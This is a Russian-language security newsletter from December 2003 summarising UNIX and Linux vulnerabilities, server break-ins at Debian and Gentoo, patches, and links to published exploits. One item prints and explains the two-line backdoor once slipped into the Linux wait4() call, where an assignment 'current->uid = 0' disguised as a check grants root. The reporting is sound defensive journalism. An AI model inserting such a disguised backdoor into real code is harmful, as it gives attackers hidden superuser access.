Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

*nix project - безопасность UNIX-систем (еженедельная) [17.11.2003--07.12.2003]


Информационный Канал Subscribe.Ru


Новости от *nix project (http://www.nixp.ru). Приготовлены к рассылке: 08.12.2003.

06.12.2003 Подробное описание уязвимости в ядре Linux fly4life
Шум вокруг уязвимости, обнаруженной в ядре Linux не утихает. Paul Starzetz из польской компании iSEC Security Research объявил о доступности документа, подробно описывающего уязвимость в функции do_brk() ядра Linux. Помимо самого описания рассматривается также пример эксплоит-кода для эксплуатации этой уязвимости с целью повышения привилегий в системе.
Описание (PDF-формат) >>
Обсудить >> | Сообщить об ошибке >>Источник: uinc.ru

06.12.2003 Хотфикс для ядра Linux fly4life
Shane Canon из университета Калифорнии выпустил хотфикс для ядра Linux, предотвращающий переполнение буфера в ядре при вызове функции do_brk(), а также фиксирующий подобную атаку в лог-файлах. Сам автор пишет, что работоспособность проверялась им на ядрах RedHat 2.4.18-27.7.xsmp и 2.4.20-20.7smp. Сам хотфикс представляет собой модуль ядра. Для его работы, естественно, необходима поддержка LKM в ядре.
Hotfix >>
Обсудить >> | Сообщить об ошибке >>Источник: uinc.ru

05.12.2003 Найдена уязвимость в rsync-серверах SHuRuP
В rsync найдена уязвимость, которая может быть использована для взлома системы.
Атакующий может, воспользовавшись возникающим переполнением, выполнять произвольный код с правами сервера rsync.
Уязвимости подвержены версии rsync 2.x до 2.5.7.
Страничка для скачивания rsync 2.5.7 >>
Обсудить >> | Сообщить об ошибке >>Источник: secunia.com

04.12.2003 Сервер ротации rsync.gentoo.org был взломан SHuRuP
Второго декабря около 3:45 GMT неизвестный произвел взлом одного из серверов, осуществляющих ротацию rsync.gentoo.org, с помощью удаленного exploit'а.
В течение часа сервер находился во взломанном состоянии. За это время с сервером успело синхронизироваться около 20 пользователей.
Что это был конкретно за сервер, не сообщается — известно лишь, что он был предоставлен одним из спонсоров gentoo.org, и, пока не завершится окончательное разбирательство, имя сервера оглашено не будет.
Решение проблемы для всех: emerge sync.
(Новость прислал: aim.)
Обсудить >> | Сообщить об ошибке >>Источник: www.gentoo.org

04.12.2003 Локальная уязвимость в ядре Linux fly4life
Сразу целый ряд производителей дистрибутивов Linux сообщил об обновлении версий ядра, включённых в эти дистрибутивы. Как сообщается, уязвимость заключается в некорректной проверке границ в функции do_brk(), что позволяет локальному злоумышленнику, путём выполнения кода повысить свои полномочия до суперпользователя. Об этой уязвимостии сообщалось ещё в сентябре Андрю Мортоном, однако был выпущен только патч, нового ядра решили в тот момент не выпускать (что, однако, пришлось сделать после громкого взлома серверов Debian). Уязвимость существует в версиях ядра до 2.4.22 включительно. Кроме того, Christophe Devine опубликовал пример эксплоита на ассемблере. Debian, RedHat, Mandraik, Trustix уже обновили свои дистрибутивы.
Подробнее >>
Эксплоит >>
Обсудить >> | Сообщить об ошибке >>Источник: uinc.ru

01.12.2003 Локальное переполнение буфера в GNU Screen fly4life
Уязвимость обнаружена в GNU Screen 4.0.1, 3.9.15 и более ранних версиях.
Локальный пользователь может послать от 2 до 3 гигабайт данных к экрану целевого пользователя, чтобы вызвать целочисленное переполнение в параметре 'w_NumArgs' в 'ansi.c' и выполнить произвольный код с set user id (setuid) root привилегиями или (setgid) utmp group привилегиями, в зависимости от инсталляции программы.
Обсудить >> | Сообщить об ошибке >>Источник: www.secritylab.ru

24.11.2003 Переполнение буфера в браузере Opera fly4life
Уязвимость обнаружена в в браузере Opera 7.22. Злонамеренный пользователь может скомпрометировать систему целевого пользователя.
Переполнение буфера обнаружено в ZIP препроцессоре при обработке скин файлов. Удаленный атакующий может выполнить произвольный код на целевой системе при посещении злонамеренного Web сайта. Уязвимость воздействует на Linux и Windows версии браузера.
Для устранения уязвимости необходимо обновить браузер до версии 7.23.
Обсудить >> | Сообщить об ошибке >>Источник: www.securitylab.ru

24.11.2003 Локальный отказ в обслуживании в ядре OpenBSD fly4life
Уязвимость обнаружена в OpenBSD 3.4 в функции sysctl(3).
Локальный пользователь может вызвать sysctl(3) со специально сформированными параметрами, чтобы аварийно завершить работу ядра.
Недостаток расположен в 'uvm_glue.c' в uvm_vsunlock().
Обсудить >> | Сообщить об ошибке >>Источник: www.securitylab.ru

24.11.2003 Еще один неудавшийся бэкдор в ядре Linux fly4life
Шестого ноября уже во второй раз (первый был обнаружен 5 ноября, и о нем уже сообщалось) была предпринята попытка внести «небольшое изменение» в CVS-зеркало ядра. Изменение состояло в добавлении двух строк в системный вызов wait4():

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

Выглядит как проверка входных параметров, но если посмотреть на выражение 'current->uid = 0', то становится ясно, что локальный процесс, вызывающий 'wait4()' с указанным значением 'options', получает права суперпользователя — классический бэкдор.
К счастью, ни в одно из публикуемых ядер это изменение попасть шансов не имело.
Обсудить >> | Сообщить об ошибке >>Источник: www.bugtraq.ru

22.11.2003 Удалённый эксплоит уязвимости в mod_gzip fly4life
Опубликован эксплоит, позволяющий удалённо получить шелл на удалённом Вэб-сервере. Работа проверена на RedHat 8.0 (Psyche) и FreeBSD 4.7. Автор — наш соотечественник — Crazy Einstein.
Эксплоит >>
Обсудить >> | Сообщить об ошибке >>Источник: www.uinc.ru

22.11.2003 Взлом Debian fly4life
Debian Project сообщил о взломе нескольких своих серверов, в частности, отвечавших за поддержку мейллистов, web, cvs, системы отслеживания ошибок. Машины проходят проверку. Отмечается, что свежевышедшее обновление Debian GNU/Linux 3.0 (woody), release 3.0r2 уже было проверено и оказалось незатронутым атакой.
Подробнее >>
Обсудить >> | Сообщить об ошибке >>Источник: www.bugtraq.ru

19.11.2003 Переполнение стекового буфера в ядре OpenBSD fly4life
Переполнение буфера обнаружено в OpenBSD 3.3, 3.4. Локальный пользователь может выполнить произвольный код с root привилегиями.
Переполнение стекового буфера обнаружено в OpenBSD в 'ibcs2_exec.c'.
Эксплоит >>
Обсудить >> | Сообщить об ошибке >>Источник: www.securitylab.ru



Обсудить новости в форуме: http://www.nixp.ru/cgi-bin/forum/YaBB.pl?board=news

http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное